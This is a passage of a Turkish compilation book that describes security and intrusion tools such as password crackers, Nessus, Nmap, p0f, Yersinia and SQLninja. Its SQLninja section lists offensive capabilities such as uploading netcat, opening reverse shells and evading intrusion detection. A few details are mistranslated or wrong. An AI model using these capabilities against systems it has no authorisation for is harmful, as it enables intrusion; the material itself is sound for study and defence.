bilgisayar_korumasi_v2

BİLGİSAYARINIZI KORUMAK İÇİN
GEREKEN YAZILIMLAR
DERLEME
2013
(Ekler 2014 Mart)
Ergün Aydalga

ÖNSÖZ
Aslında kitabın adına “hack” ya da “saldırı” mı demeli yoksa “koruma” mı
bilemedim. Çünkü bilgisayarcı açısından her ikisi de aynı şey. Biri yasal ve izin
alınarak yapılan işlemler, diğer yasa dışı... İstenmeden başkasının ortamına girip
dolaşmak, onun verilerini, bilgilerini kurcalamak, hatta silmek... Gizlice....
Burada anlatılan yazılımların çoğu Linux dağıtımlarında vardır. Ubuntu, Fedora gibi
Linux dağıtımlarında bulunurlar ve ücretsiz indirilip kurulabilirler. Bazılarının
Windows seçenekleri de vardır. Windows altında çalışanlar ilgili Windows
sürümleriyle birlikte anlatılacaktır. Yalnız Windows ortamında çalışan yazılımlardan
da söz ettim.
Burada derlediğim programları daha çok paylaşıma açık, açık kaynak kodları olan
ve “freeware” ya da GPL lisansı altında yayınlananlar arasından seçtim. İsteyen
her zaman kaynak kodlara bakabilir, gerek duyduğunda değişiklik yapabilir diy
düşündüm.
Bu ürünlerin anlatımlarını kendi Web sitelerinde yazılanlardan aldım. Bir kısmını
kullanırken anladıklarımı yazarak, diğer kısmını var olan sayfaları Türkçe anladığım
biçimiyle yorumlayarak buraya aldım. Çok kullanılan programlardan bazılarında
kullanıcı el kitapları vardı. Onları da anlaşılır biçimde buraya almaya çalıştım.
Programları derlerken yaptıkları işlere göre sınıflara bölmeye çalıştım.
BÖLÜM 1
İlk bölümde şifreler, sorunlu dosyalar (sızanın bıraktığı gibi) ve silinen dosyalar için
kullanılan programları anlattım.
BÖLÜM 2
İkinci bölümde ağ inceleme ve tarama programlarına önem verdim. Yerel ağ,
uzaktaki ağlar, erişilen sunucular, ağ topoğrafyasının çıkarılması gibi bilgileri
anlatmaya çalıştım. Aslında programların yaptıklarını anlatırken, ağa sızan birisi
gibi sunucuları nasıl bulup yorumlayacağımı gördüm. Hatta bu programların
çoğunu kendi bilgisayarıma kurup kendi ağ ortamımda çalışmalarını
değerlendirdim.
BÖLÜM 3
Üçüncü bölümde SQL veri tabanlarının kırılma noktalarını, nasıl içine sızılıp ek
komut girileceğini gösteren programlara ayırdım. Hemen her ortamda bir yolunu
bulup sızan bu programların veri tabanı üreticisine bakmaksızın nasıl ekleme
yapabildiklerini hayretle izledim.

Bölüm 4
Bu bölüme ağı koklayan ve paketleri yakalayan programları yerleştirdim. En
önemlilerinden olan Kismet ve Wireshark bu bölümde incelediğim programlardır.
Kismet yalnız kablosuz ağlar için yazılmış, Wireshark adı üzerinde kablolu ağlar
için yazılmış gibi gözükse de Wireshark kablosuz ağlarda da kullanılmaktadır.
Wireshark Windows sürümü sık kullanılan bir programdır. Kismet'e oranlar
wireshark yalnız izlemede kalır.
Bölüm 5
BU bölümde ele alınan kırma araçları, çeşitli programlarda kullanılan şifre kırma
araçlarıdır. Şifrenizi unutmuşsanız sizin için yararlı programlardır. Ama başkasının
şifresini kırıyorsanız suç işliyorsunuzdur.
Bölüm 6
IPMI/BMC ile ilgili sorunu ayrı bir başlık altında incelemek istedim. Ana kart
üzerinde IPMI varsa ve bilgisayarınız elektriğe takılıysa, her an biri “hack”
edebilirmiş. Açık olması, işletim sisteminin çalışması gerekmezmiş. Bazen
bilgisayarların ethernet kartlarından bağlantıyı gösteren ışığın (yeşil ve sarı ışık)
göz kırptığını görünce hattaki paketler derdim, halbuki ana kartta bulunan IPMI
iletişime geçiyormuş...
Bir ağda akan bilginin tutulması (yakalanması) işlemine forensics (adli bilişim)
adı verilir. Bu konuda iş yapan bir çok yazılım vardır. İlgilenenler
http://www.forensicswiki.org/wiki/Network_forensics sayfasından bu yazılımların
tablosuna bakabilirler. Tabloyu incelediğinizde benim derlediğim yazılımların da bu
tabloda olduğunu görebilirsiniz.
2014 yılında “Saldırgan Korunma” yeni bir boyut kazandı. Kali Linux işletim sistemi
( http://www.kali.org/ ) 300'den çok sızıntı deneme ve güvenlik denetimi
programıyla ağ korunmasını öne çıkaran bir kavramla kullanıma sunuldu. Aslında
“Backtrack” yaratıcılarınca yapılan kali-linux, bir çok “harcker” için de kullanışlı bir
ortam olabilir. Bu bölümde (Bölüm 7) saldırgan savunma ya da korunma konularını
işlemeye çalışacağım.
2014 yılı akıllı mobil cihazlarda sızıntı, izleme ve dinleme yönlü bir çok olayla da
gündeme geldiğinden Bölüm 8'de bu konuda toplayabildiklerimi derlemeye
çalışacağım.
Ergün Aydalga

İÇİNDEKİLER
BÖLÜM 1
ŞİFRE KIRMA, SORUNLU DOSYALARI ARAMA, DOSYA SİLME PROGRAMLARI
CHKROOTKIT 8
BÖLÜM 2
BÖLÜM 3
ERASER 8
JOHN THE RIPPER 8
CAIN & ABEL 9
LCP ve SID&User 9
AĞ İNCELEME/TARAMA PROGRAMLARI
NESSUS 11
ARGUS 14
SNORT 17
BRO 17
NETFLOW 17
NMAP 17
p0f 18
YERSINIA 19
NETSTUMBER 20
SQL EKLEMEK İÇİN KULLANILAN PROGRAMLAR
SQLNINJA 22
SQL POİZON 23
HAVIJ 1.15 PRO SQL EKLEME 26
BÖLÜM4
SNIFFER (KOKLAYANLAR)
KISMET 32
WIRESHARK 33
METASPLOIT 33
DİĞER HACKER ARAÇLARI
ICRACK (Şifre kırıcı) 33
bobokit 33
woot-project 33
Diğer Bağlantılar
InfoSysSec.org: Nasıl hack edilir. 34
Ağ işgali ve hacking 34

hping 34
hping2 34
BÖLÜM 5
KIRMA ARAÇLARI
pdfcrack 35
Hydra 35
BÖLÜM6
ÖNEMLİ BİR GÜVENLİK SORUNU IPMI/BMC
IPMI 37
KAPANMIŞ SUNUCULARI BİLE HACK EDEBİLİRSİNİZ 37
Sunucu Yönetim Sistemindeki Hacker delikleri
Neredeyse fiziksel erişime kucak açar (Hacker
Holes in Server Management System Allow
‘Almost-Physical’ Access) 39
IPMI ve BMC'lere Sızma Denemeleri El Kitabı
(A Penetration Tester's Guide to IPMI and BMC's)
Giriş 40
BMC ve IPMI Protokolü 40
Yüksek Değerdeki Hedefler 41
Ağ Hizmetleri 41
Supermicro IPMI (firmware SMT_X9_218) 42
Ağ Keşfi 42
Kullanıcı adı ve Şifreler 43
Kırılganlığı Çıkartma 43
IPMI Şifre Denetimini Chiper 0 ile geçmek 43
IPMI 2.0 RAKP Şifre Denetimi Uzaktan
Karışık Şifre Alma 45
IPMI Anonymous (Adsız) Şifre Denetimi 48
Supermicro IPMI UPnP Kırılganlığı 48
Supermicro IPMI Açık Metin Şifreleri 49
BMC'den Sunucuyu açma 50
Sunucudan BMC'ye Erişmek 50
Özet 51

FreeIPMI
Proje Araçları 52
Proje Kitaplıkları 55
BÖLÜM 7
SALDIRGAN KORUNMA (KALI LINUX)
Kali Linux ile sızma denemeleri: 56
Metasploit sınırlamalarını kaldırma: 56
Kablosuz saldırlar: 56
Çevreyi kırmak/delmek 56
Gelişmiş Windows gediklerinden yararlanma 57
Gelişmiş Web saldırıları 57
GİRİŞ 57
Kali Linux Kullanılabilir mi 58
KALİ İNDİRME 59
Canlı Kali ISO dosyası üretmek 60
Kişiselleştirilmiş Kali Linux yapma
Güncel Kali ISO yaratma 61
Kali Masaüstünü değiştirme 61
Kali Linux Genel Kullanımı
Kali Linux kaynak kod depoları 62
NVIDIA Sürücüleri kullanma 63
Sanal kutu misafiri olarak Kali 64
Kali ve Windows ikili işletim sistemi 65
BÖLÜM 8
AKILLI TELEFONLARDA DİNLEME
Telefon casus yazılımları 67
Yazılımların telefon gereksinimleri 68
Yazılımlar nasıl çalışır? 68
Casus yazılımı uzaktan yüklemek 69
Yazılım Yükleme 69
Cep Telefonlarını Hackleme 69

EK-1 NMAP KULLANICI KİTABI 70
Ek-2 SQLninja Kullanıcı El Kitabı 110
Ek-3 Kismet 2011-01-R1 Mike Kershaw 145
http://www.kismetwireless.net
Ek-4 bnc config 174
(http://www.gnu.org/software/freeipmi/bmc-config-example.conf)
Ek-5 IPMI 181
HPC çevresinde Sunucu Aralığı Giriş/Çıkışlarını
(Hostrange Input/Output) Kullanma
Ek-6 Wireshark Kullanıcı El Kitabı (User Manual) 193
Ek-7 TELEFON CASUS YAZILIMLARI İNCELEMELERİ 231
Ek-8 AKILLI TELEFON HACKLEME 235

BÖLÜM 1
ŞİFRE KIRMA, SORUNLU DOSYALARI ARAMA,
DOSYA SİLME PROGRAMLARI
CHKROOTKIT:
Bu yazılım trojan / worm / virus dosyası tarar.
Bir izleme programıdır. Sisteme eklenen ya da değiştirilen dosyaları izler. Böylece
hassas alanlarda hangi dosyaların değiştiği belirlenmiş olur. Chkrootkit bazı bilinen
dosyalar, trojan komutları ve worm'lar için sistemi araştırır.
Yeni türleri eklemek için yazılım sürekli güncellenmektedir.
ERASER
Gelişmiş güvenlik aracıdır. Windows ortamlarında kullanılır. Hassas verilerinizin
disk sürücünüzden silinmesini sağlar. Dosyanın üzerine defalarca yazarak
okunamaz hale getirir. Windows XP (Sp 3), Windows Server 2003 (SP 2) Windows
Vista, Windows Server 2008 Windows 7 ve Windows Server 2008 R2 altında çalışır.
Eraser ücretsiz yazılımdır ve GPL lisansı ile dağıtılır (http://eraser.heidi.ie/ adresine
bakınız).
Bir çok insan başkalarıyla paylaşmayacağı bilgileri bilgisayarlarında saklarlar.
Şifreler, işle ilgili sınıflandırılmış belgeler, maaş bordroları, finansal kayıtlar, diğer
kişisel bilgiler, resimler ve aşk mektupları (ya da iletileri) ve şiirler gibi...
Bu tür dosyalar silindiğinde, dosyaların üzerine yazmadığınızı düşünürsünüz ama,
silmeyi geri alma programlarıyla herkes dosyaların içindeki verilere kolaylıkla
erişebilir. Çünkü bilgisayarda veri silinmez, silinen dosya adının ilk harfidir.
Herhangi bir program da bu bilgiye kolaylıkla erişebilir.
ERASER ÖZELLİKLERİ
Windows sürümleriyle çalışır (eski Windows sürümleri için eski sürüm
gerekir)
Windows ile çalışan her cihazla çalışır.
Dosyaların silinmesi, klasörler ve bunların önceden silinmiş biçimleri için
kullanılır.
ERASER programı ve kullanıcı kitapçığı için http://eraser.heidi.ie/documentation/
adresine bakınız.
JOHN THE RIPPER
Şu anda UNIX ortamlarında kullanılabilen en hızlı şifre kırıcılardandır. DOS, BeOS,
OpenVMS gibi eskiden kullanılan işletim sistemleri için de uygun bir programdır.
http://www.openwall.com/john/ adresinden programı indirebilirsiniz.

CAIN & ABEL
Microsoft İşletim Sisteminde şifre çözme / kurtarma aracıdır. Ağı koklayarak
değişik şifre türlerinin çözülmesinde de kullanılır. Şifreleri sözlük kullanarak, kaba
kuvvet ve kripto çözümleme gibi saldırı teknikleriyle kırar. VoIP (Voice over IP)
konuşmalarını kaydeder, karıştırılmış şifreleri çözer ve kablosuz ağ anahtarlarını
bulur. Yönlendirme protokollerini belirler. Bu kadar çok iş yapan bu program, küçük
bir emekle düzeltilebilecek yazılım kırılımlarını ve varsa yazılım hatalarını aramaz.
Programın amacı, protokol standartlarında bulunan güvenliğin bilinen zayıf
taraflarını kullanarak işlem yapmaktır. Bunların arasında şifreleme teknikleri,
gizleme mekanizmaları vardır. Asıl amaç şifrelerin kolaylıkla çözülmesi /
kurtarılmasıdır.
Can & Abel ağ yöneticilerine, öğretmenlere, güvenlik danışmanlarına, güvenlik
yazılımı hazırlayan üreticilere, profesyonel sistemlere ve ağlara sızma denemeleri
yapanlara hazırlanmış bir programdır.
Program yazarı, yasa dışı kullanmaya çalışanları desteklemez onlara yardımcı
olmaz.
Programın son sürümünü ve ayrıntılı açıklamalarını http://www.oxid.it/cain.html
adresinden sağlayabilirsiniz.
LCP ve SID&User
Programa ait bilgiyi http://www.lcpsoft.com/english/index.htm adresinde
bulabilirsiniz.
LCP programının ana amacı Windows ortamında (NT/2000/XP/2003) kullanıcı
hesabı şifresini denetlemek ve çözmektir. Bu ürünün özellikleri şöyle sıralanabilir:
Dıştan Alınan Hesap Bilgileri
Yerel bilgisayardan
Uzaktaki bilgisayardan
SAM (Sequential Access Method) dosyadan
LC dosyadan
LCS dosyadan
PwDump dosyasından
Sniff dosyasından

Şifre çözme
Sözlük kullanarak saldırı
Kaba kuvvet ve sözlük karışımı kullanarak
Kaba kuvvet saldırısı
Kaba kuvvet oturum dağıtımı
Oturum dağıtımı
Oturum birleştirme
Karıştırma Hesaplaması
LM ve NY şifreyle karıştırma hesaplaması
LM ve NT şifre ve sunucu sorgulamasıyla yanıt hesaplaması
SID&User programı, Windows için (NT/2000/XP/2003) SID ve kullanıcı adını bulup
çıkaran araçtır. Özellikleri:
Bir hesap adı için SID alma
Bir SID ya da SID aralığı için hesap adı alma

BÖLÜM 2
AĞ İNCELEME/TARAMA PROGRAMLARI
NESSUS
Bu programı yalnız kendi sistemleriniz için kullanın. Başka sistemler için
kullandığınızda hakkınızda yasal işlem başlatılabilir.
NMAP gibi bir tarama değildir. NESSUS sisteminizdeki boşlukları tarar ve onları
bulurken sisteminize zarar verebilecek işlemleri yapar. Bu nedenle başkasının
sisteminde kullanınca o sistemlere zarar verebilirsiniz. Kendi sisteminizde
kullanmadan önce yedek almanızı öneririm.
Nessus her konuda eksikleri giderilmiştir ve etkin bir programdır. Sisteminizdeki
servisleri tanımlar ve onları delmeye çalışır. Eğer kırılganlık varsa, “güncelleme”,
“ayarların düzeltilmesi” ve “yamaların nerede bulunacağı” önerisinde bulunur.
Sorunu ayrıntılarıyla anlatarak sisteminizin neden kırılgan olduğunu da söyler. Ek
olarak çıktılarını HTML, ve grafik çizelgelerle de verebilir. HTML sayfalarının
güvenlik raporlarına, güncellemelere ve yamalara bağları da bulunur. Unix, Linux
ve Windows işletim sistemlerini kırılganlık için tarayabilir.
Nessus yazılımı http://Nessus.org sitesinden sağlanabilir.
NESSUS ÇALIŞTIRMA
Nessus kullanıcısı /usr/sbin/nessus-adduser ile sisteme eklenir:
Login admindude
Şifreleme tekniği (cipher/plaintext) [cipher]
admindude bu sistemdeki yerel kullanıcı mıdır [ |n]? y
Yeni şifre:
...
/usr/sbin/nessusd ile sunucu yazılımı başlatılır
ya da
/etc/rc.d/init.d/nessusd start kullanarak arka plan programı başlatılır.
Kullanıcı programını başlat:
/usr/bin/nessus
Burada ekrandaki giriş alanları aşağıdaki çizimlerde gösterildiği gibi doldurulur:
Aşağıdaki pencerede önce “login” bilgilerinizi girin ve “login” düğmesine basın.

“localhost” sunucu adı olarak kullanıldığından nessus sunucusunun bulunduğu
sisteme giriş yapılır. Başka bir sistem için sistemin adı ya da IP numarası
girilmelidir.

Eklenebilir yazılımlar aşağıdaki tablodan seçilir:
Eklenebilir yazılımlarda seçim işe uygun olanlar arasından yapılır. Unutmayın
ki “tehlikeli” yazılımlar sisteme zarar verebilir.
“Hedef seçimi” (Target selection) ile incelenecek sunucunun IP numarası
girilir.
Bundan sonra “Taramayı başlat” (Start the scan) seçilir ve beklenir (Bir
bilgisayarı incelemek yaklaşık 15 dakika sürmektedir).

Sol penceredeki kolondan tüm sonuç raporları görülebilir ve istenen HTML
kalıbına çevrilebilir.
Yazılım ayar dosyası: /etc/nessus/nessusd.conf
ARGUS
Ağ denetim kayıtları üretim ve kullanım sistemidir. Argus ağ işlemleri denetimi
üzerine yoğunlaşmıştır. Ayrıca ağ işlemlerinde verim ve güvenliği destekleyen ilk
örnek (prototype) teknolojisini de üretebilir. Eğer ağ paketlerine, sorunu çözmek
için bakarsanız ya da ağda neler olup bittiğini görmek isterseniz Argus'un kullanışlı
bir araç olduğunu görürsünüz. Başka bir amaçla bakınca bir yorum getirmek doğru
olmaz. Ama ağda neler olup bittiğini gören iyi bir yazılımcı, yapmak istediğini
izlediklerinden çıkarabilirse, yeterince tehlikeli olur zaten.
Argus algılayıcıları ağ paketlerini işler (ya canlı paket verilerini ya da daha önce
izlenip saklanmış dosyalardaki verileri) ve ayrıntılı durum raporlarını üretir. Akış
raporlarında daha çok her akışın yapısı incelenir, inceleme sırasında büyük ölçüde
veri indirgemesi yapıldığından, işlemlerin saklanabilmesi olanağı doğar. Özellikle
çok büyük oylumlu ağ verileri kısa bir zamanda incelenebilir. Argus erişebilirlik,

ağlanabilirlik, süre, hız, yükleme ve verim, kayıp, döküntü, yeniden gönderme ve
gecikme metriklerini tüm ağ akışları için sağlar. Paketlerde var olan L2 adresleri,
tünel tanımları (MPLS, GRE, ESP vb.) ve benzeri protokol tanımlarını, SAP'leri,
döngü sayaçlarını, seçenekleri ve L4 taşıyıcı tanımlarını ve benzeri nitelikleri
yakalar. Bu konuda (L2, L4, MPLS, GRE vb.) bilgi edinmek isteyen okuyuculara
önerim http://en.wikipedia.org/wiki/OSI_model adresine bakmalarıdır. Bu sayfanın
Türkçesi için (yeterli olmamakla birlikte) http://tr.wikipedia.org/wiki/OSI_modeli
incelenebilir.
Ağ denetimi pek çok kurumda kullanılır. Bu kurumlar çoğu kez eldeki verilere
dayanarak klasik IDS tabanlı ağ güvenliği oluştururlar. Denetimlerde snort ve/veya
Bro kullanarak, IDS (Intrusion Detection System / Sızıntı Belirleme Sistemi)
teknolojisi benzeri yapay uyarıları ve alarmlar yaratırlar. Amaç; Güvenliği doğru
sağlayıp sağlamadıklarını görmektir. Ağ denetimini argus kullanarak yaparken
sorunun uyarı ve alarmlardan mı geldiğini bulmaya çalışırlar. Pek çok DIY (Do-ityourself)
yüklemelerinde snort, Bro ve argus beraber çalıştırılır. Argus'un ürettiği
denetim raporlarına göre ağ güvenliği düzenlenir.
Argus tarafından üretilen denetim verileri ağ ücretlendirmesi muhasebesinde,
işletim yönetimi ve verimlilikte de sıklıkla kullanılmaktadır.
Aslında IETF IPFIX Çalıştay'ında (Workshop) tanımlanan mimarinin uygulaması
olarak düşünülebilir ama Argus için IPFIX mimarisinin bir üst kümesi demek daha
doğrudur. Argus teknolojisi Cisco Netflow verilerini okuyabilir. Pek çok site argus
ve netflow verilerinin karışımını denetimde kullanabilmektedir.
Argus açık kaynak projesidir ve Mac OSX, Linux, Solaris, FreeBSD, OpenBSD,
NetBSD, AIX, IRIX üzerinde çalışabilmektedir. Windows (Cygwin ve OpenWrt ile)
sürümü de vardır.
Yazılım küçük değişikliklerle UNIX'in diğer türevlerinde de çalışabilir. Internet
işlemlerinin denetiminde gereken verim ve hız, modern hesaplama kaynaklarıyla
sağlanır.
Argus Dökümanı
argus
ağ paketlerinden denetim kayıtları üretir.
argus.conf
argus sistemi ayar dosyasıdır.
Argus veri toplama ve dağıtım sistemi dokumanı
radium
Argus veri toplama, analiz ve dağıtımı
radium.conf
radium ayar dosyası.

Argus ve veri kullanıcıları dokumanı
ra
okunanı filitrele ve argus verilerini yazdır
rarc
ra* programlarının ayar dosyası
rabins
argus verilerini yapısal parçalara böl
racluster
argus verilerini kümeleme
racluster.conf
argus veri kümeleme ayar dosyası
raconvert
ascii akış verilerini argus kalıbına çevirme
racount
argus veri akışında nesneleri işaretle
radump
tcpdump ayıklayıcısıyla kullanıcı verilerini ayıklama
raevent
argus tarafından üretilen olayları okuma
rafilteraddr
Yüksek verimli argus veri eleme
ragraph
rrdtool tabanlı zaman çizelgesi
ragerep
Saklanan veriden kurallı işlemlerle veri arama
rahisto
argus veri metriklerinin frekans analiz verileri
ralabel
dil bilim kuralına uygun uzantı işaretleme
ralabel.conf
dil bilim kuralı ayar dosyası
ranonymize
argus verilerinin anonimleştirilmesi
ranonymize.conf
anonimleştirme ayar dosyası
rapath
argus verilerinden topoloji üretme
rapolicy
Sürekli veri iletişim politikası kontrolü
rasort
Argus verilerini sıralama
rasplit
Argus verilerini yapısal OS tabanlı dosyalara dönüştürme
rasql
Yerel argus verilerini mysql veri tabanından okuma
rasqlinsert
Yerel argus verilerini mysql veri tabanına ekleme ve okuma

astream
Akıcı argus veri bloklarını işleme
rastrip
argus veri işleme ve sıkıştırma
SNORT
UNIX/Linux tabanlı Sızıntı Belirleme Sistemidir (Intrusion Detection System).
Ayrıntılı bilgi http://www.snort.org/ Web sayfasından sağlanabilir. En sık kullanılan
IDS/IPS sistemlerden biridir. Dokümantasyon için http://www.snort.org/docs
sayfasına bakabilirsiniz.
BRO
Ağ güvenliği izleme ekranıdır. http://www.bro.org/ web sayfasından hakkındaki
bilgilere erişilebilir. Burada ele alınmasının en büyük nedeni Argus ile beraber
kullanılabiliyor olmasıdır. Gözlem ve izlemenin yanı sıra istatistiksel incelemelere
de yer vermesi IDS/IPS sistemlerinde sorunu saptamaya yönelik ip uçları vermesini
sağlar.
NETFLOW
Cisco tarafından geliştirilmiştir. IP uygulamaları için bir dizi anahtar servis sağlar.
Bunların arasında ağ trafiği muhasebesi, ağ güvenlik planlaması, Servis red'lerini
izleme becerisi ve ağ izlemesi de vardır. Ağ kullanıcıları ve ağ programları için çok
değerli bilgiler sunar. Cisco'nun ürünü olan Netflow IP trafik açısında lider
yazılımdır (Cisco'nun sayfasından). Ayrıntılı bilgi için
http://www.cisco.com/en/US/products/ps6601/products_ios_protocol_group_home.
html adresine bakın.
NMAP
Ağ inceleme ve denetleme programıdır. Açık kaynak kod kullanır. Pek çok kimse
sistemlerin ayakta kalma sürelerini izlerken, planlamayı düzenlerken, ağda olanları
kaydederken nmap için kullanışlı bir program olduğunu düşünür. NMAP ilkel
mesajlar göndererek ağda hangi sunucuların olduğunu ve her sunucuda hangi tür
servislerin bulunduğunu, hangi tür güvenlik kalkanı kullanıldığını ve daha başka
özellikleri belirler. Nmap hemen her tür işletim sisteminde çalışabilir. Linux
dağıtımlarında bulunur. Nmap sitesinde gelişmiş kullanıcı arayüzü olan zenmap
vardır. Ncat, Ndiff ve Nping gibi hazır komutları bulunur.
Nmap
Esnektir. Güvenlik kalkanlarıyla, eleklerle donatılmış ağlarda bile
kullanılabilen bir yapısı vardır.
Güçlüdür. Nmap yüz binlerce bilgisayarı arayabilecek biçimde hazırlanmıştır.

Taşınabilir. Bir çok işletim sisteminde çalışır. Linux, Microsoft Windows,
FreeBSD, OpenBSD, Solaris, IRIX, Mac OS X, HP-UX, NetBSD, Sun OS, Amiga
gibi
Kolaydır. Çok kolaylıkla “nmap -v -A targethost” yazarak başlatabilirsiniz.
Birçok parametreyle de kullanılabilmektedir.
Dokümanları kullanışlı ve çoktur.
Üretici tarafından desteklenmektedir. Sorun olduğunda her zaman cevap
verecek birileri vardır.
Beğenilmektedir. Bir çok başarı ödülü almıştır.
Herkesin bildiği bir uygulamadır.
Nmap kullanıcı kitabı için Ek-1'de bakınız.
p0f
Bu program, ağ trafiğinin TCP/IP iletişimi arkasındaki sistemleri tanımlamakta
kullanılır. Bunu yaparken çoğu kez SYN kadar kısa bir mesaj kullanır.
Bazı p0f özellikleri şunlardır:
Çok hızlı bir biçimde karşı sistemde kullanılan işetim sistemini belirler.
Ağ bağlantılarını ve sistemlerin ayakta kalma sürelerini verir.
Bağlantı paylaşımı / NAT (Network Address Translation) bilgilerini verir.
Kullanıcı ya da servisleri belirler (X-mail gibi)
Program hem arka planda hem de terminalden çalıştırılabilir.
Ağa giriş testleri sırasında yapılan keşif genel kullanım biçimidir. Sıradan ağ
izleme, yetkisiz ağ bağlantılarını belirleme, gereksiz koruma araçları hakkında
sinyal üretmek ve diğer özellikleri vardır.
Tipik p0f çıktısı aşağıdaki gibi olabilir:
.-[ 1.2.3.4/1524 -> 4.3.2.1/80 (syn) ]-
|
| client = 1.2.3.4
| os = Windows XP
| dist = 8
| params = none
| raw_sig = 4:120+8:0:1452:65535,0:mss,nop,nop,sok:df,id+:0
|
`----
.-[ 1.2.3.4/1524 -> 4.3.2.1/80 (mtu) ]-
|
| client = 1.2.3.4
| link = DSL
| raw_mtu = 1492
|
`----

.-[ 1.2.3.4/1524 -> 4.3.2.1/80 (uptime) ]-
|
| client = 1.2.3.4
| uptime = 0 days 11 hrs 16 min (modulo 198 days)
| raw_freq = 250.00 Hz
|
|
`----
.-[ 1.2.3.4/1524 -> 4.3.2.1/80 (http request) ]-
|
| client = 1.2.3.4/1524
| app = Firefox 5.x or newer
| lang = English
| params = none
| raw_sig = 1:Host,User-Agent,Accept=[text/html,application/xhtml+xml...
|
`----
p0f özellikle aşağıdaki konularda etkindir:
TCP SYN (yani kim benim bilgisayarıma bağlanıyor). Çeşitli sistemlerden
gelen imzalar, özellikle eski platformlardan gelenler, ya da NetBSD,
Windows 9x, IRIX, Playstation, Cisco IOS vb. Eğer sisteminizde p0f
çalışıyorsa bu sistemlerin size bağlanması söz konusu olamaz.
TCP SYN+ACK türü imzalar da (Ben kime bağlanıyorum gibi) veri tabanı ile
sınırlıdır, bu nedenle herkese kapı açıktır. Bu tür imzaları toplamak için
“p0f-sendsyn” aracına gerek vardır. Bunu daha sonra karşı sistemde açık
olan bir başka kapıya (kapıya) bağlantı kurarak yanıtlanır (ayrıntılı bilgi için
bakınız: http://lcamtuf.coredump.cx/p0f3/README).
HTTP isteği ile ilgili imzalar özellikle eski tarayıcılar için geçerlidir. MSIE5,
mobil cihazlar ve oyun konsolları, robot toplayıcılar, komut satırından çalışan
araçlar ve bazı kitaplıklar bu gruba girer. Eğer p0f kullanıcı sisteminde varsa
ya da Web sunucuda bulunuyorsa bu tür bilgileri toplayabilirsiniz.
HTTP yanıt imzaları. Burada p0f en küçük veri tabanını kullanarak sinyalleri
gönderilir. Her özel durum için imzalar üç biçimde toplanır: Biri browser,
diğeri curl sonuncusu ise wget olur.
YERSINIA
Değişik ağ protokollerindeki zayıflıkları arayıp bunlardan yarar sağlamak için
yapılmış ve ağ tarama aracıdır. İlgilendiği ağlar için sert bir çerçeve olduğu
savını ileri sürer.
Son sürümde bazı ağ protokolleri programa uyarlanmıştır. Aşağıdaki ağ
protokolleri için saldırılar da uyarlanmıştır (tabi ki sizler yenilerini eklemekte
özgürsünüz)

Spanning Tree Protocol, STP)
Cisco Discovery Protocol (CDP)
Dynamik Trunking Protokol (DTP)
Dynamic Host Configuration Protocol (DHCP)
Hot Standby Router Protocol (HSRP)
IEEE 802.1Q
IEEE 802.1X
Inter-Switch-Link Protocol (ISL)
VLAN Trunking Protocol (VTP)
Ayrıntılı bilgi için http://www.yersinia.net/index.htm adresine bakınız.
NETSTUMBER
Marius Milner tarafından yazılmıştır.
Windows için bir araçtır. WLAN ağlarını 802.11b, 802.11a ve 802.11g
kullanarak saptar. Bir çok kullanım biçimi vardır:
Ağınızın istediğiniz gibi kurulmuş olup olmadığını denetlersiniz.
WLAN ağınızdaki zayıf noktaların bulunmasını sağlarsınız.
Sizin ağınıza giriş yapan, sizin ağınızla çakışan diğer ağları
saptarsınız.
Yardım amaçlı yönlendirilmiş antenlerle uzak WLAN
bağlantılarına erişirsiniz.
Savaş sürdürmek için yeniden yaratıcı amaçla kullanın.
Gereksinim
NetStumber gereksinimleri daha çok donanıma bağımlıdır. İşletim
sistemi, firmware ve sürücü sürümleri de buna eklenmelidir. En iyisi
“Sisteminizde çalışıyor mu?” sorusunu deneyerek görmektir.
Bazı sistemler denenmiş olduklarından çalışır diye bilinmektedir.
Ayrıntılı bir liste http://www.stumbler.net/compat adresinde vardır.
Bu NetStumbler Windows 2000, Windows XP ya da daha yenisini ister.
Proxim model 8410-WD ve 8420-WD çalışır. 8410-WD aslında Dell
TrueMobile 1150, Compaq WL110, Avaya Wireless 802.11b PC kartları
olarak da satılmıştır.
Intersil Prism/Prism2 chip takımı kullanan bir çok kart da çalışır.

Birçok 802.11b, 802.11a vee 802.11g kablosuz LAN adaptörleri
Windows XP ile çalışmalıdır. Bazıları windows 2000'de de çalışabilir. Bir
çoğu doğru olmayan sinyal gücü raporlar ve eğer kart erişim yöntemi
olrak NDIS 5.1 kullanıyorlarsa , o zaman gürültü düzeyi raporlanmaz.
Bunlar Atheros, Atmel, Broadcom, Cisco ve Centrino türü kartları içerir.
Bir kartta hangi chip takımı olduğu saptanamaz (program tarafından).
Ayrıntılar için http://www.stumbler.net/readme/readme_0_4_0.html adresine
bakınız.

BÖLÜM 3
SQL EKLEMEK İÇİN KULLANILAN PROGRAMLAR
Veri tabanı “hack” işlemi veri tabanı üreticisinin ürününe göre değişir.
http://www.databasesecurity.com/ adresinde çeşitli veri tabanları için bir çok
yöntemin ve yazılımın olduğunu görürsünüz. Veri tabanı kullanımı güvenlik
açısından çok da iyi bir yöntem değilmiş gibi görünmektedir.
SQLNINJA
Bu programın özellikleri şöyle sıralanabilir:
Karşıdaki SQL sunucunun (sürümü, işlem yapan kullanıcı, kullanıcı yetkileri,
xp komut satırı “xp_cmdshell” varlığı, veri tabanı yetki konumu) gibi
bilgilerini almak,
SA (Sistem Yöneticisi) şifresini bulmaya çalışmak (bir sözlükten yararlanarak
aramak)
xp komut satırını oluşturmak (xp_cmdshell eğer daha önce silinmişse)
Normal HTTP isteği kullanarak (FTP/TFTP gerekmeden) sunucuya “netcat”
yüklemek
TCP/UDP kapı tarayıp (hedef SQL sunucudan saldıran bilgisayara kadar)
kullanılabilecek bir port (kapı) var mı aramak,
Doğrudan ya da ters bağlantı var mı aramak (TCP ve UDP için)
ICMP tünel kabuğu var mı bakmak. TCP ve UDP olmadan doğrudan ya da
ters kabuk VT sunucusuyla dış adres çözümü yapabilir.
DNS tünelli yalancı kabuk var mı bakmak. Doğrudan ya da ters kabuk için
TCP/UDP port'ları (kapıları) vardır ama VT kullanıcı bilgisayarını “ping”
edilebilir.
DNS tünelli yalancı kabuk var mı bakmak. Doğrudan ya da ters kabuk için
hiç TCP/UDP portu (kapısı) yokken dış adresleri çözümlemektedir (bunun
nasıl olduğunu görmek için dokümantasyona bakın).
IDS/IPS/WAP vb. kaçırmak için kullanılabilecek bir teknik bulmak

Metasploit3 ile ilişki kurup uzaktaki VT erişiminde grafik arayüz ile VNC
üzerinden sunucuya girebilmek.
SQLninja programının kullanımı için Ek-2'ye bakınız.
SQL POİZON
